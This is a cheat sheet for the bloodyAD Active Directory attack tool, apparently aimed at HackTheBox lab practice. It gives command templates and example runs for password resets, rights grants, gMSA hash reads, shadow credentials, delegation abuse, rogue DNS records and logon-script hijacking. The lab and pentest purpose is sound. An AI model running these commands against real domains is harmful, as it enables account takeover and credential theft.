Installation

Using uv

1
uv tool install bloodyAD

Using pipx

1
pipx install bloodyAD

Retrieve User Information

1
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username

Example:

1
2
3
4
5
6
7
8
$ bloodyAD --host dc.redelegate.vl -d redelegate.vl -u helen.frost -p P@ssword1 get object administrator

distinguishedName: CN=Administrator,CN=Users,DC=redelegate,DC=vl
accountExpires: 1601-01-01 00:00:00+00:00
adminCount: 1
cn: Administrator
description: Built-in account for administering the computer/domain
userAccountControl: NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD; NOT_DELEGATED

Add User To Group

1
bloodyAD --host $dc -d $domain -u $username -p $password add groupMember $group_name $member_to_add

Example:

1
2
$ bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'it-computer3$' -k add groupMember helpdesk 'it-computer3$'
[+] it-computer3$ added to helpdesk

Change Password

1
bloodyAD --host $dc -d $domain -u $username -p $password set password $target_username $new_password

Example:

1
2
$ bloodyAD --host DC1.KLENDATHU.VL -d KLENDATHU.VL -u rasczak -p starship99 set password RICO NewP@ssw0rd
[+] Password changed successfully!

Give User GenericAll Rights

1
bloodyAD --host $dc -d $domain -u $username -p $password add genericAll $DN $target_username

Example:

1
2
$ bloodyAD --host dc01.rebound.htb -d rebound.htb -u oorend -p '1GR8t@$$4u' add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' oorend
[+] oorend has now GenericAll on OU=SERVICE USERS,DC=REBOUND,DC=HTB

Using the SID:

1
2
$ bloodyAD --host dc01.rebound.htb -d rebound.htb -u oorend -p '1GR8t@$$4u' add genericAll 'S-1-5-21-2410575906-3092493790-2123333151-1104' 'S-1-5-21-750635624-2058721901-1932338391-2617'
[+] S-1-5-21-750635624-2058721901-1932338391-2617 has now GenericAll on S-1-5-21-2410575906-3092493790-2123333151-1104

WriteOwner

1
bloodyAD --host $dc -d $domain -u $username -p $password set owner $target_group $target_username

Example:

1
2
$ bloodyAD --host dc01.haze.htb -d dc01.haze.htb -u 'Haze-IT-Backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' set owner SUPPORT_SERVICES 'Haze-IT-Backup$'
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by Haze-IT-Backup$ on SUPPORT_SERVICES

ReadGMSAPassword

1
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username --attr msDS-ManagedPassword

Example:

1
2
3
4
5
$ bloodyAD --host dc01.vintage.htb -d vintage.htb -u 'fs01$' -p 'P@ssw0rd' -k get object 'gMSA01$' --attr msDS-ManagedPassword

distinguishedName: CN=gMSA01,CN=Managed Service Accounts,DC=vintage,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:54311f0ed05b807a7aaf5943b595f224
msDS-ManagedPassword.B64ENCODED: c6qwf6x+EXiEYKGhCu/wTBcnp6hz3ppQG2uReaV8QV+JCaIhn2MobwBxF4Q6fd3W5P13wvh2Jf/Wp2WHsjIEjkbF0duDHoCBAK31Q+BoQg0eUHbsRcksNrkLcPtkZ5eUhK+TzgpXeFKt0VCOWFkAOStKE1H5PDfUGoC2xuP+Tceg7iV0IcMBaR8Db3UgqaqP2LLRiimuL6ZO4xl6sSRKrdRQEQOR7L9fFw9JW7myCsbj2TPxFc5WaMQtWi456OvwBQn4jhdty5tSjv2uMlcq+sQMz60voxH6sClACPGKJMCr2FNVJP6dd1GTdvh6n5Dbh/yhHCAF8UzYeGXv2Nx3Dw==

Enable a Disabled Account

1
bloodyAD --host $dc -d $domain -u $username -p $password remove uac $target_username -f ACCOUNTDISABLE

Example:

1
2
$ bloodyAD --host dc01.mirage.htb -d mirage.htb -u mark.bbond -p '1day@atime' -k remove uac javier.mmarshall -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from javier.mmarshall's userAccountControl

Add The TRUSTED_TO_AUTH_FOR_DELEGATION Flag

1
bloodyAD --host $dc -d $domain -u $username -p $password add uac $target_username -f TRUSTED_TO_AUTH_FOR_DELEGATION

Example:

1
2
$ bloodyAD --host dc.redelegate.vl -d redelegate.vl -u helen.frost -p 'P@ssword1' -k add uac 'FS01$' -f TRUSTED_TO_AUTH_FOR_DELEGATION
[-] ['TRUSTED_TO_AUTH_FOR_DELEGATION'] property flags added to FS01$'s userAccountControl

Modify UPN

1
bloodyAD --host $dc -d $domain -u $username -p $password set object $old_upn userPrincipalName -v $new_upn

Example:

1
2
$ bloodyAD --host dc-01.darkcorp.htb -d darkcorp.htb -u john.w -p 'Pack_Beneath_Solid9!' set object angela.w userPrincipalName -v angela.w.adm
[+] angela.w's userPrincipalName has been updated

Check if it has been modified

1
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_user --attr userPrincipalName

Example:

1
2
3
4
$ bloodyAD --host dc-01.darkcorp.htb -d darkcorp.htb -u john.w -p 'Pack_Beneath_Solid9!' get object angela.w --attr userPrincipalName

distinguishedName: CN=Angela Williams,CN=Users,DC=darkcorp,DC=htb
userPrincipalName: angela.w.adm

MachineAccountQuota

Enumerate MachineAccountQuota

1
bloodyAD --host $dc -d $domain -u $username -p $password get object 'DC=dc,DC=dc' --attr ms-DS-MachineAccountQuota

Example:

1
2
3
4
$ bloodyAD --host dc-01.darkcorp.htb -d darkcorp.htb -u administrator -p ':fcb3ca5a19a1ccf2d14c13e8b64cde0f' get object 'DC=darkcorp,DC=htb' --attr ms-DS-MachineAccountQuota

distinguishedName: DC=darkcorp,DC=htb
ms-DS-MachineAccountQuota: 0

Set MachineAccountQuota value to 10

1
bloodyAD --host $dc -d $domain -u $username -p $password set object 'DC=dc,DC=dc' ms-DS-MachineAccountQuota -v 10

Example:

1
2
$ bloodyAD --host dc-01.darkcorp.htb -d darkcorp.htb -u administrator -p ':fcb3ca5a19a1ccf2d14c13e8b64cde0f' set object 'DC=darkcorp,DC=htb' ms-DS-MachineAccountQuota -v 10
[+] DC=darkcorp,DC=htb's ms-DS-MachineAccountQuota has been updated

Modify the email

1
bloodyAD --host $dc -d $domain -u $username -p $password set object $target_user mail -v newmail@test.local

Example:

1
2
$ bloodyAD --host dc01.scepter.htb -d scepter.htb -u a.carter -p P@ssw0rd set object d.baker mail -v h.brown@scepter.htb
[+] d.baker's mail has been updated

Modify the altSecurityIdentities attribute (ESC14B)

1
bloodyAD --host $dc -d $domain -u $username -p $password set object $target_user altSecurityIdentities -v 'X509:<RFC822>user@test.local'

Example:

1
2
$ bloodyAD --host dc01.scepter.htb -d scepter.htb -u h.brown -k set object p.adams altSecurityIdentities -v 'X509:<RFC822>p.adams@scepter.htb'
[+] p.adams's altSecurityIdentities has been updated

Find Writable Attributes

1
bloodyAD --host $dc -d $domain -u $username -p $password get writable --detail

Example:

1
2
3
4
$ bloodyAD --host dc01.scepter.htb -d scepter.htb -u 'h.brown' -k get writable --detail

distinguishedName: CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb
altSecurityIdentities: WRITE

Shadow Credentials

1
bloodyAD --host $dc -d $domain -u $username -p $password add shadowCredentials $target

Example:

1
$ bloodyAD --host haze.htb -d haze.htb -u 'haze-it-backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' -s add shadowCredentials 'edward.martin'

WriteSPN

1
bloodyAD --host $dc -d $domain -u $username -p $password set object $target servicePrincipalName -v 'domain/meow'

Example:

1
2
$ bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' set object alfred servicePrincipalName -v 'tombwatcher/meow'
[+] alfred's servicePrincipalName has been updated

Find Deleted Objects

1
bloodyAD --host $dc -d $domain -u $username -p $password get writable --include-del

Example:

1
2
3
4
$ bloodyAD --host dc.voleur.htb -d voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn -k get writable --include-del

distinguishedName: CN=Todd Wolfe\\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted Objects,DC=voleur,DC=htb
permission: CREATE_CHILD; WRITE

Extended Search Operations

1
bloodyAD --host $dc -d $domain -u $username -p $password get search -h

e.g.

1
-c 1.2.840.113556.1.4.2064 -c 1.2.840.113556.1.4.2065 to display tombstoned
1
bloodyAD --host $dc -d $domain -u $username -p $password -k get search -c 1.2.840.113556.1.4.2064 -c 1.2.840.113556.1.4.2065

Restore a deleted object

1
bloodyAD --host $dc -d $domain -u $username -p $password -k set restore $user_to_restore

Example:

1
2
$ bloodyAD --host dc.voleur.htb -d voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn -k set restore todd.wolfe
[+] todd.wolfe has been restored successfully under CN=Todd Wolfe,OU=Second-Line Support Technicians,DC=voleur,DC=htb

Create a new computer account

1
bloodyAD --host $dc -d $domain -u $username -p $password add computer $computer_name $computer_password

Example:

1
2
$ bloodyAD --host DC1.delegate.vl -d delegate.vl -u n.thompson -p 'KALEB_2341' add computer meow 'P@ssw0rd'
[+] meow created

Add Resource Based Constrained Delegation

1
bloodyAD --host $dc -d $domain -u $username -p $password add rbcd 'DELEGATE_TO$' 'DELEGATE_FROM$'

Example:

1
2
3
$ bloodyAD --host dc2.domain.local -d domain.local -u 'C.Carlssen' -k add rbcd svc_sql 'meow$'
[!] No security descriptor has been returned, a new one will be created
[+] meow$ can now impersonate users on svc_sql via S4U2Proxy

Register a DNS Record

1
bloodyAD --host $dc -d $domain -u $username -p $password add dnsRecord $record_name $attacker_ip

Example:

1
2
$ bloodyAD --host S200401.overwatch.htb -u sqlsvc -p TI0LKcfHzZw1Vv add dnsRecord SQL07 10.10.14.61
[+] SQL07 has been successfully added

Overwrite the logon script path

1
bloodyAD --host $dc -d $domain -u $username -p $password set object $DN scriptPath -v $file

Example:

1
2
$ bloodyAD --host garfield.htb -d garfield.htb -u j.arbuckle -p 'Th1sD4mnC4t!@1978' set object 'CN=Liz Wilson,CN=Users,DC=garfield,DC=htb' scriptPath -v 'printerDetect.bat'
[+] CN=Liz Wilson,CN=Users,DC=garfield,DC=htb's scriptPath has been updated

Collect Bloodhound data

1
bloodyAD --host $dc -d $domain -u $username -p $password get bloodhound

Example:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ bloodyAD --host DC2.pong.htb -d pong.htb --dc-ip 192.168.2.2 -u c.roberts -k get bloodhound
[+] Connecting to LDAP server
[+] Connected to LDAP serrver
Dumping schema: 2it [00:00,  5.33it/s]
Generating lookuptable: 96it [00:00, 102.83it/s]
Dumping SDs:  99%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████▌ | 99/100 [00:09<00:00,  9.98it/s]
Dumping domains: 100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 1/1 [00:00<00:00,  3.66it/s]
Dumping users: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 16/16 [00:00<00:00, 112.13it/s]
Dumping computers: 100%|███████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 2/2 [00:00<00:00, 21.41it/s]
Dumping groups: 100%|███████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 52/52 [00:00<00:00, 328.41it/s]
Dumping GPOs: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 3/3 [00:00<00:00, 31.36it/s]
Dumping OUs: 100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 2/2 [00:00<00:00, 23.38it/s]
Dumping Containers: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 19/19 [00:00<00:00, 99.91it/s]
[+] Bloodhound data saved to 20260426T192924_Bloodhound.zip
[+] Found 1 trusts

Change Group Type to Domain Local

1
bloodyAD --host $dc -d $domain -u $username -p $password set object $group groupType -v -2147483644

Example:

1
2
$ bloodyAD --host DC2.pong.htb -d pong.htb -u c.roberts -k set object 'CN=gMSA Managers,CN=Users,DC=pong,DC=htb' groupType -v -2147483644
[+] CN=gMSA Managers,CN=Users,DC=pong,DC=htb's groupType has been updated

Get the msDS-ManagedPassword blob

1
bloodyAD --host $dc -d $domain -u $username -p $password get search --filter '(sAMAccountName=account_name$)' --attr 'msDS-ManagedPassword,msDS-ManagedPasswordId,sAMAccountName' --raw

Example:

1
2
3
4
5
6
$ bloodyAD --host dc2.pong.htb -d pong.htb -u 'c.roberts@ping.htb' -k get search --filter '(sAMAccountName=Pong_gMSA$)' --attr 'msDS-ManagedPassword,msDS-ManagedPasswordId,sAMAccountName' --raw

distinguishedName: CN=Pong_gMSA,CN=Managed Service Accounts,DC=pong,DC=htb
msDS-ManagedPassword: AQAAACQCAAAQABIBFAIcAnhZG1ix0PWawJDVD5CKMgZ7hrJ18mTj...[SNIP]
msDS-ManagedPasswordId: AQAAAEtEU0sCAAAAbAEAAAIAAAAAAAAAM1Hudw9yHvOOVt4ob5...[SNIP]
sAMAccountName: Pong_gMSA$

Notes

  • Pass -k to use kerberos authentication.
  • You can pass a user hash instead of a password using -p :hash.
  • Specify format for --password or -k <keyfile> using -f, e.g. -f rc4.

Resources

Machines To Practice (HackTheBox)

  • Redelegate
  • Vintage
  • Infiltrator
  • Rebound
  • Absolute
  • Certified
  • TombWatcher
  • Voleur
  • PingPong